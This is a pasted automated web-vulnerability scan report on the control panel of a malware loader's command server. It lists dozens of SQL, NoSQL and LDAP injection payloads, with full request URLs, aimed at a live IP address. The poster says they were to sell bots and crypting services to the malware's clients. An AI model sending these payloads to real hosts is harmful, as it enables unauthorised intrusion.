Scan run on the Bunny Loader malware C2, with and without any context. SQL injection, as well as complete compromise of the panel, will result from these issues. This loader is NOT stable until these are fixed. Consider all clients compromised.
For context, the URL was given to me by the Bunny Loader administrator, as I was supposed to provide bots as well as crypt services to his clients. I quickly realized the panel was awfully coded, and tested it. The results are horrible and the owner refuses to fix them, even when I offered to do so for free. The bin is available in the GitHub report: https://github.com/opsecfreak/Bunny-Loader-ADE-Vulnerability-Report-Uncrypted-Sample/

Generated on Tue, 12 Mar 2024 02:10:09

ZAP Version: 2.14.0

Summary of Alerts

Risk Level     Number of Alerts
High           19
Medium         12
Low            10
Informational  24

Alerts

Name Risk Level Number of Instances
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause High 6
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (Generic comment) High 6
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) High 3
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (MySQL comment) High 7
Advanced SQL Injection - Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) High 1
Advanced SQL Injection - MySQL < 5.0 boolean-based blind - Parameter replace (original value) High 1
Advanced SQL Injection - MySQL > 5.0.11 stacked queries (comment) High 1
Advanced SQL Injection - MySQL >= 5.0.12 AND time-based blind High 1
Advanced SQL Injection - MySQL >= 5.0.12 AND time-based blind (SELECT) High 1
Advanced SQL Injection - MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) High 1
Advanced SQL Injection - MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause High 6
Advanced SQL Injection - PostgreSQL boolean-based blind - Stacked queries High 1
External Redirect High 1
LDAP Injection High 1
NoSQL Injection - MongoDB High 10
Path Traversal High 1
SQL Injection High 60
SQL Injection - Authentication Bypass High 3
SQL Injection - SQLite High 21
Absence of Anti-CSRF Tokens Medium 6
Anti-CSRF Tokens Check Medium 3
Application Error Disclosure Medium 10
Bypassing 403 Medium 2
Content Security Policy (CSP) Header Not Set Medium 50
Directory Browsing Medium 10
HTTP Only Site Medium 8
Insecure HTTP Method - TRACE Medium 50
Missing Anti-clickjacking Header Medium 27
Relative Path Confusion Medium 1
Sub Resource Integrity Attribute Missing Medium 26
XSLT Injection Medium 45
Big Redirect Detected (Potential Sensitive Information Leak) Low 1
Cookie No HttpOnly Flag Low 7
Cookie without SameSite Attribute Low 7
Cross-Domain JavaScript Source File Inclusion Low 10
In Page Banner Information Leak Low 5
Insufficient Site Isolation Against Spectre Vulnerability Low 1
Permissions Policy Header Not Set Low 50
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) Low 27
Server Leaks Version Information via "Server" HTTP Response Header Field Low 54
X-Content-Type-Options Header Missing Low 29
Authentication Request Identified Informational 6
Cookie Slack Detector Informational 24
GET for POST Informational 7
Information Disclosure - Sensitive Information in URL Informational 4
Information Disclosure - Suspicious Comments Informational 5
Insecure HTTP Method - COPY Informational 1
Insecure HTTP Method - LOCK Informational 1
Insecure HTTP Method - MKCOL Informational 1
Insecure HTTP Method - MOVE Informational 1
Insecure HTTP Method - PROPFIND Informational 1
Insecure HTTP Method - PROPPATCH Informational 1
Insecure HTTP Method - UNLOCK Informational 1
Modern Web Application Informational 6
Non-Storable Content Informational 25
Possible Username Enumeration Informational 4
Sec-Fetch-Dest Header is Missing Informational 38
Sec-Fetch-Mode Header is Missing Informational 38
Sec-Fetch-Site Header is Missing Informational 38
Sec-Fetch-User Header is Missing Informational 44
Session Management Response Identified Informational 33
Storable and Cacheable Content Informational 30
User Agent Fuzzer Informational 98
User Controllable HTML Element Attribute (Potential XSS) Informational 4
Verification Request Identified Informational 1

Passing Rules

Name Rule Type Threshold Strength
Private IP Disclosure Passive HIGH -
Session ID in URL Rewrite Passive HIGH -
Insecure JSF ViewState Passive HIGH -
Java Serialization Object Passive MEDIUM -
Vulnerable JS Library (Powered by Retire.js) Passive HIGH -
Charset Mismatch Passive HIGH -
Cookie Without Secure Flag Passive HIGH -
Re-examine Cache-control Directives Passive HIGH -
Content-Type Header Missing Passive HIGH -
Information Disclosure - Debug Error Messages Passive HIGH -
Information Disclosure - Sensitive Information in HTTP Referrer Header Passive HIGH -
HTTP Parameter Override Passive MEDIUM -
Open Redirect Passive HIGH -
Cookie Poisoning Passive HIGH -
User Controllable Charset Passive HIGH -
WSDL File Detection Passive HIGH -
Loosely Scoped Cookie Passive HIGH -
Viewstate Passive HIGH -
Heartbleed OpenSSL Vulnerability (Indicative) Passive HIGH -
Strict-Transport-Security Header Passive HIGH -
X-Backend-Server Header Information Leak Passive HIGH -
Secure Pages Include Mixed Content Passive HIGH -
Full Path Disclosure Passive MEDIUM -
HTTP to HTTPS Insecure Transition in Form Post Passive HIGH -
HTTPS to HTTP Insecure Transition in Form Post Passive HIGH -
User Controllable JavaScript Event (XSS) Passive HIGH -
Retrieved from Cache Passive HIGH -
X-ChromeLogger-Data (XCOLD) Header Information Leak Passive HIGH -
CSP Passive HIGH -
X-Debug-Token Information Leak Passive HIGH -
Username Hash Found Passive HIGH -
X-AspNet-Version Response Header Passive HIGH -
PII Disclosure Passive HIGH -
Script Passive Scan Rules Passive HIGH -
Stats Passive Scan Rule Passive HIGH -
Example Passive Scan Rule: Denial of Service Passive MEDIUM -
An example passive scan rule which loads data from a file. Passive MEDIUM -
Base64 Disclosure Passive MEDIUM -
Timestamp Disclosure Passive HIGH -
Hash Disclosure Passive HIGH -
Cross-Domain Misconfiguration Passive HIGH -
Source Code Disclosure Passive MEDIUM -
Weak Authentication Method Passive HIGH -
Reverse Tabnabbing Passive HIGH -
Dangerous JS Functions Passive MEDIUM -

Sites

The scan recorded traffic to the following hosts. For every one of them the report's per-site tables (HTTP Response Code / Number of Responses, and Parameter Name / Type / Flags / Times Used / # Values) are empty, and no authentication statistics were found.

https://apis.google.com
https://www.gstatic.com
https://www.google.com
https://chromewebstore.googleapis.com
https://beacons.gcp.gvt2.com
https://update.googleapis.com
https://optimizationguide-pa.googleapis.com
https://content-autofill.googleapis.com
https://cdnjs.cloudflare.com
https://142.202.242.172
https://accounts.google.com
https://www.googleapis.com
http://142.202.242.172

Alert Detail

High
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54%27%29%29+AND+7912%3D1403+AND+%28%28%27vmhR%27+LIKE+%27vmhR
Method GET
Parameter id
Attack 54')) AND 6789=6789 AND (('gXVD' LIKE 'gXVD
Evidence
Request Header - size: 752 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV%29+AND+1534%3D9087+AND+%284583%3D4583&id=54
Method GET
Parameter bot
Attack DESKTOP-95IQEEV) AND 4080=4080 AND (5432=5432
Evidence
Request Header - size: 754 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54%25%22+AND+9750%3D1167+AND+%22%25%22%3D%22
Method GET
Parameter id
Attack 54%" AND 8365=8365 AND "%"="
Evidence
Request Header - size: 807 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%22+AND+4111%3D4019+AND+%22Uzoz%22%3D%22Uzoz
Method GET
Parameter id
Attack 54" AND 1752=1752 AND "VyqD"="VyqD
Evidence
Request Header - size: 743 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query%27+AND+8878%3D3300
Method GET
Parameter query
Attack query' AND 4219=4219
Evidence
Request Header - size: 485 bytes.
Request Body - size: 0 bytes.
Response Header - size: 333 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter task_select
Attack 1%' AND 7527=7527 AND '%'='
Evidence
Request Header - size: 850 bytes.
Request Body - size: 180 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 6
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'.

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (Generic comment)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav?query=query+AND+7293%3D4638--+-
Method GET
Parameter query
Attack query AND 5117=5117-- -
Evidence
Request Header - size: 490 bytes.
Request Body - size: 0 bytes.
Response Header - size: 335 bytes.
Response Body - size: 154 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects?query=query%22%29+AND+3961%3D3329--+-
Method GET
Parameter query
Attack query") AND 6329=6329-- -
Evidence
Request Header - size: 486 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?query=query+AND+3439%3D5093--+-
Method GET
Parameter query
Attack query AND 5756=5756-- -
Evidence
Request Header - size: 662 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV+AND+9029%3D6759--+-&value=%271%27%3D1%27&id=54
Method GET
Parameter bot
Attack DESKTOP-95IQEEV AND 9899=9899-- -
Evidence
Request Header - size: 785 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27%27%29%29+AND+6761%3D4003--+-&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter command
Attack '1'=1'')) AND 9886=9886-- -
Evidence
Request Header - size: 816 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter unit_EXEC
Attack 18.9 AND 7130=7130-- -
Evidence
Request Header - size: 850 bytes.
Request Body - size: 158 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 6
Solution
(Identical to the solution text given under the first alert above.)
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54%27%29%29%29+AND+1524%3D6642%2516
Method GET
Parameter id
Attack 54'))) AND 3826=3826%16
Evidence
Request Header - size: 749 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27%29+AND+6750%3D6907%2516&id=54
Method GET
Parameter value
Attack '1'=1') AND 4774=4774%16
Evidence
Request Header - size: 789 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%25%27%29%29+AND+3912%3D6599%2516
Method POST
Parameter id
Attack 54%')) AND 1623=1623%16
Evidence
Request Header - size: 883 bytes.
Request Body - size: 138 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 3
Solution
(Identical to the solution text given under the first alert above.)
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--%20/Sound%20Effects?query=query%27+AND+9600%3D8462%23
Method GET
Parameter query
Attack query' AND 2652=2652#
Evidence
Request Header - size: 497 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--?query=query%25%27+AND+8574%3D4031%23
Method GET
Parameter query
Attack query%' AND 8547=8547#
Evidence
Request Header - size: 481 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi?query=query%25%22+AND+7672%3D2978%23
Method GET
Parameter query
Attack query%" AND 1286=1286#
Evidence
Request Header - size: 283 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi?query=query%29+AND+2865%3D5035%23
Method GET
Parameter query
Attack query) AND 9928=9928#
Evidence
Request Header - size: 280 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW%27+AND+9178%3D7531%23
Method POST
Parameter key
Attack EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW' AND 1570=1570#
Evidence
Request Header - size: 1,078 bytes.
Request Body - size: 129 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter params
Attack ' UNION SELECT @@version -- - AND 1726=1726#
Evidence
Request Header - size: 850 bytes.
Request Body - size: 157 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%29%29+AND+6674%3D5309%23
Method POST
Parameter id
Attack 54')) AND 4365=4365#
Evidence
Request Header - size: 878 bytes.
Request Body - size: 138 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 7
Solution
(Identical to the solution text given under the first alert above.)
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%25%27%3BIF%286448%3D5605%29+SELECT+6448+ELSE+DROP+FUNCTION+rLMz--&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter id
Attack 54%';IF(7722=7722) SELECT 7722 ELSE DROP FUNCTION MRvj--
Evidence
Request Header - size: 1,033 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 1
Solution
(Identical to the solution text given under the first alert above.)
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - MySQL < 5.0 boolean-based blind - Parameter replace (original value)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects?query=%28SELECT+%28CASE+WHEN+%287490%3D9017%29+THEN+%27+ELSE+7490*%28SELECT+7490+FROM+mysql.db%29+END%29%29
Method GET
Parameter query
Attack (SELECT (CASE WHEN (4536=4536) THEN ' ELSE 4536*(SELECT 4536 FROM mysql.db) END))
Evidence
Request Header - size: 370 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
Instances 1
Solution
(Identical to the solution text given under the first alert above.)
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - MySQL > 5.0.11 stacked queries (comment)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter params
Attack ' UNION SELECT @@version -- -));SELECT SLEEP(5)#
Evidence
Request Header - size: 850 bytes.
Request Body - size: 169 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
Instances 1
Solution
(Identical to the solution text given under the first alert above.)
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - MySQL >= 5.0.12 AND time-based blind
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter sec-ch-ua
Attack "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"")) AND SLEEP(5) AND (("PQXH"="PQXH
Evidence
Request Header - size: 779 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
(Identical to the solution text given under the first alert above.)
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - MySQL >= 5.0.12 AND time-based blind (SELECT)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter params
Attack ' UNION SELECT @@version -- -) AND (SELECT * FROM (SELECT(SLEEP(5)))kgZD)
Evidence
Request Header - size: 850 bytes.
Request Body - size: 200 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
Instances 1
Solution
(Identical to the solution text given under the first alert above.)
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi?query=query%27%29+AND+MAKE_SET%282815%3D4252%2C4252%29+AND+%28%27ueQl%27%3D%27ueQl
Method POST
Parameter query
Attack query') AND MAKE_SET(6740=6740,6078) AND ('Hgka'='Hgka
Evidence
Request Header - size: 349 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
Instances 1
Solution
(Identical to the solution text given under the first alert above.)
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%20OR%201=1?query=query%22%29+RLIKE+%28SELECT+%28CASE+WHEN+%284126%3D5859%29+THEN+0x7175657279+ELSE+0x28+END%29%29+AND+%28%22YByN%22%3D%22YByN
Method GET
Parameter query
Attack query") RLIKE (SELECT (CASE WHEN (3115=3115) THEN 0x7175657279 ELSE 0x28 END)) AND ("lLCV"="lLCV
Evidence
Request Header - size: 388 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav?query=query%25%27%29%29+RLIKE+%28SELECT+%28CASE+WHEN+%282121%3D7848%29+THEN+0x7175657279+ELSE+0x28+END%29%29+AND+%28%28%27%25%27%3D%27
Method GET
Parameter query
Attack query%')) RLIKE (SELECT (CASE WHEN (8694=8694) THEN 0x7175657279 ELSE 0x28 END)) AND (('%'='
Evidence
Request Header - size: 593 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter sec-ch-ua-mobile
Attack ?0') RLIKE (SELECT (CASE WHEN (8958=8958) THEN 0x3f30 ELSE 0x28 END)) AND ('IIJx' LIKE 'IIJx
Evidence
Request Header - size: 789 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1%25%27+RLIKE+%28SELECT+%28CASE+WHEN+%289656%3D7648%29+THEN+1+ELSE+0x28+END%29%29+AND+%27%25%27%3D%27&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter task_select
Attack 1%' RLIKE (SELECT (CASE WHEN (6114=6114) THEN 1 ELSE 0x28 END)) AND '%'='
Evidence
Request Header - size: 1,067 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS%25')%20RLIKE%20(SELECT%20(CASE%20WHEN%20(7616=5031)%20THEN%200x54515549413732394a41554c414d4a53%20ELSE%200x28%20END))%20AND%20('%25'='/tasks_page.php
Method POST
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS%') RLIKE (SELECT (CASE WHEN (2926=2926) THEN 0x54515549413732394a41554c414d4a53 ELSE 0x28 END)) AND ('%'='
Evidence
Request Header - size: 609 bytes.
Request Body - size: 0 bytes.
Response Header - size: 204 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query%29%29+RLIKE+%28SELECT+%28CASE+WHEN+%283791%3D4771%29+THEN+0x7175657279+ELSE+0x28+END%29%29+AND+%28%284078%3D4078
Method POST
Parameter query
Attack query)) RLIKE (SELECT (CASE WHEN (8670=8670) THEN 0x7175657279 ELSE 0x28 END)) AND ((7410=7410
Evidence
Request Header - size: 599 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 6
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'.

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - PostgreSQL boolean-based blind - Stacked queries
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV%3BSELECT+%28CASE+WHEN+%285664%3D7016%29+THEN+5664+ELSE+1%2F%28SELECT+0%29+END%29--&id=54
Method GET
Parameter bot
Attack DESKTOP-95IQEEV;SELECT (CASE WHEN (3792=3792) THEN 3792 ELSE 1/(SELECT 0) END)--
Evidence
Request Header - size: 870 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 1
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'.

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
External Redirect
Description
URL redirectors represent common functionality employed by web sites to forward an incoming request to an alternate resource. This can be done for a variety of reasons and is often done to allow resources to be moved within the directory structure and to avoid breaking functionality for users that request the resource at its previous location. URL redirectors may also be used to implement load balancing, leveraging abbreviated URLs or recording outgoing links. It is this last implementation which is often abused in phishing attacks. URL redirectors do not necessarily represent a direct security vulnerability but can be abused by attackers trying to social engineer victims into believing that they are navigating to a site other than the true destination.
URL http://142.202.242.172/xampp
Method GET
Parameter host
Attack 7548671629728595560.owasp.org
Evidence 7548671629728595560.owasp.org
Request Header - size: 254 bytes.
Request Body - size: 0 bytes.
Response Header - size: 248 bytes.
Response Body - size: 370 bytes.
Instances 1
Solution
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Use an allow list of approved URLs or domains to be used for redirection.

Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving your site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems when generating the disclaimer page.

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

For example, ID 1 could map to "/login.asp" and ID 2 could map to "https://www.example.com/". Features such as the ESAPI AccessReferenceMap provide this capability.

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields.
Reference https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html
https://cwe.mitre.org/data/definitions/601.html
Tags OWASP_2021_A03
WSTG-v42-CLNT-04
OWASP_2017_A01
CWE Id 601
WASC Id 38
Plugin Id 20019
High
LDAP Injection
Description
LDAP Injection may be possible. It may be possible for an attacker to bypass authentication controls, and to view and modify arbitrary data in the LDAP directory.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter password
Attack Equivalent LDAP expression: [\' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),\'a\') -- -)(objectClass=*]. Random parameter: [p1znp6wofqs4vmgkdzob037dwmdnpaovyv3zcpy7o9xf829jwq90wooa3789bdsugi4tptljm7y2pfxq34kv4exmqusopkl92uwo6].
Evidence
Request Header - size: 1,061 bytes.
